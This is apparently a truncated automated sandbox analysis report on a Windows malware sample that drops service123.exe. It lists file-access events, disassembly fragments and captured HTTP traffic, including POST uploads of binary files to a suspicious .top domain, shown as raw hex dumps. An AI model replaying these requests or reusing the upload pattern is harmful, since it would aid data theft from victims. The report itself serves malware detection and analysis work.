Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 9_2_00EC15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
9_2_00EC15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 9_2_6CB114B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
9_2_6CB114B0 |
Source: C:\Users\user\Desktop\2QPrBtk3J8.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\2QPrBtk3J8.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\Desktop\2QPrBtk3J8.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\2QPrBtk3J8.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\2QPrBtk3J8.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\2QPrBtk3J8.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
9_2_00EC81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8AEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8AF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8AF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CB30860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 2Ch |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6CBD49A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CB3A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6CB3A9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6CB3A970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CBEF960h |
9_2_6CB2EB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB344B4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6CBB84A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6CB3A580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CB3A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
9_2_6CB3A5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6CB3C510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CB3E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6CB3E6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
9_2_6CBB0730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6CB30740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8C040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8C1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
9_2_6CB6A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
9_2_6CB30260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6CBED014h] |
9_2_6CBE4360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8BD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
9_2_6CB87D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
9_2_6CB83840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
9_2_6CB3D974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6CB4BBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6CB4BBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB8B4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
9_2_6CB3D504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CBEDFF4h |
9_2_6CB83690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
9_2_6CB89600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
9_2_6CB3D674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
9_2_6CB3D7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB2B1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
9_2_6CBB3140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
9_2_6CB3D2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
9_2_6CBA7350 |
Source: global traffic |
HTTP traffic detected: GET /axNhXgnGYoPSgajZFkaQ1729862659 HTTP/1.1Host: home.tventji20ht.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: tventji20ht.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------iKazh4mixrpgczOsoxAgLYData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 69 4b 61 7a 68 34 6d 69 78 72 70 67 63 7a 4f 73 6f 78 41 67 4c 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 75 73 65 73 75 66 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5d fd 95 d1 26 c4 49 c5 82 1b 86 11 0c 92 d3 85 df 42 f1 7f 07 d6 3b c7 98 04 13 3f 5c 4f ba ad f0 68 e7 14 14 22 c7 3c 30 cc 32 20 08 26 b5 62 cd 90 b9 1f 37 e2 4b 92 0d 03 fb 4c 84 da ce 1c 5d 96 33 fe 17 ab eb 7d 71 5c 81 d0 e4 e1 0a 7e 9b 79 e8 c5 66 cd 5a d8 ac 79 a6 36 a3 7c 5f 42 1f 26 74 3b 83 d6 e6 19 68 83 d6 84 a8 c1 cc 64 c6 07 c2 d1 00 c2 86 b5 ec 7c 9a 84 d4 b9 a5 b9 3e 4e cb 23 14 c1 ae 62 ca 5c 5e 6e 95 c9 d5 62 58 6c 4a 0d 20 21 fb d3 9f 03 42 f7 0b 92 c4 fb e8 ed 2f 88 69 d2 f2 e2 06 14 5e a2 53 f5 60 38 29 73 74 3a 68 62 4c 75 5a c1 b7 94 d4 86 f4 c9 52 e7 3b 29 94 e8 d4 65 d2 67 e9 9a 2e 2a f7 d4 91 11 d9 9f 19 cc f3 7f 09 68 a7 71 2d f5 a4 98 4f de 64 94 90 c2 38 c3 f8 d6 17 be 52 25 5a ed 23 14 ec 87 3c ca 44 11 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 69 4b 61 7a 68 34 6d 69 78 72 70 67 63 7a 4f 73 6f 78 41 67 4c 59 2d 2d 0d 0a Data Ascii: --------------------------iKazh4mixrpgczOsoxAgLYContent-Disposition: form-data; name="file"; filename="Tusesufu.bin"Content-Type: application/octet-stream]&IB;?\Oh"<02 &b7KL]3}q\~yfZy6|_B&t;hd|>N#b\^nbXlJ !B/i^S`8)st:hbLuZR;)eg.*hq-Od8R%Z#<D--------------------------iKazh4mixrpgczOsoxAgLY-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: tventji20ht.topAccept: */*Content-Length: 63927Content-Type: multipart/form-data; boundary=------------------------UTc77GTCFsB0i0F6SKqnITData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 55 54 63 37 37 47 54 43 46 73 42 30 69 30 46 36 53 4b 71 6e 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 75 63 69 76 61 6d 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d6 8d 59 15 82 7e 28 6d 1b f3 f0 eb c1 44 b5 5c f9 f4 1a ed 9f e1 96 1b 26 3f 8e 56 4e fe dc 86 75 5d 9c 90 b2 20 c9 b8 c2 60 2e b2 da 8e 27 5c 31 aa 47 7b 6b 4e 65 fb b6 4b b5 ae c8 f4 91 8e 33 f6 c8 3e 16 d1 a2 8d ce 3f bf 7b b7 d4 c8 10 95 b8 26 9e 28 99 2c e5 0e b2 0e 92 37 4f 04 c4 6b 32 59 ff b7 5e 63 94 24 ff e6 29 cd f1 7f 1c 58 03 fc 88 af 7c 2b 22 7a a7 02 75 dc 27 77 5a 89 67 4a 4e ba 37 01 5c a6 cc 6e b7 e6 16 b3 cd ab fc ef f6 c6 92 97 64 e0 4f b2 d3 ed fe b1 c0 3a 53 ce 95 8d 48 f9 81 05 da d1 c3 de 11 33 4e 48 d7 b1 84 b5 37 e6 87 e1 30 fa 29 06 92 db 59 2b a4 45 62 54 eb 42 c1 34 3d 5b d1 2b b4 84 3c c1 5e db 4a b9 23 1f c4 b9 fa b3 40 b5 4e 25 19 8f b1 e9 87 2d 96 01 66 d0 97 d9 03 d0 91 59 7e c7 e7 3b 90 7a 53 8d 2d 8f 75 9d 49 ee 7c 63 6c 1b c4 d0 95 72 b4 0b 0b 55 1a ae ae 9f 6b 6c d4 ce 4d be d5 a9 69 2f 7c cf dd 63 49 43 74 e6 16 4f 7f 44 ea b7 ea 5b 1a 7b 99 3a 89 5e 3e 34 e7 6c f7 12 f9 4e 94 ca be 79 a0 56 99 8d 0a 8e 3d 34 dd 38 72 4a 7d eb 74 ff 63 6b 17 14 aa 26 18 b7 9c c3 32 43 cd fb bb 2b 13 5e 06 cb 4a f9 a2 9b eb 24 06 0c 7b 76 c5 4c 8b 93 e1 ba 32 a6 58 16 4d c8 dd 32 70 7e d4 08 ce 7a a7 50 c9 5f 52 2e f6 93 06 9f ce 5f 73 b9 92 19 90 a0 f3 63 65 54 e9 90 0b 70 fb af 8c f4 59 ed 78 36 91 41 29 e2 1b 55 8b e6 60 36 7a f1 f3 a8 7a 72 70 b3 d0 ed 80 b4 00 50 78 0b da 12 75 11 58 c9 80 2c 3f 95 66 36 4c c5 d3 a2 67 d6 f7 60 af 0d ec d6 47 0d 05 cf de bf 3b 62 68 1a a2 7c 53 8e f8 aa 67 1e 57 09 18 5e 44 0b ad a7 e9 7b 98 29 2c 36 45 96 78 f4 63 f2 e2 52 47 40 07 88 fe 6f e3 0f a8 a4 9e ad 2e 75 d7 fb d2 17 84 62 e9 a9 ff 54 83 b3 8f 53 fa 16 f6 ab 33 d2 ac 28 ba 7d eb 5b 23 a8 f4 ad 89 15 c7 b4 93 b3 01 cd 9e de eb 78 e0 bd 49 5f c6 06 b1 4d 0e 56 4e 23 6f d6 bc 79 c6 cd ee b6 b9 2b 30 c3 5d 6f 6a 6b 94 40 e9 61 15 3b 1f 4e 6 |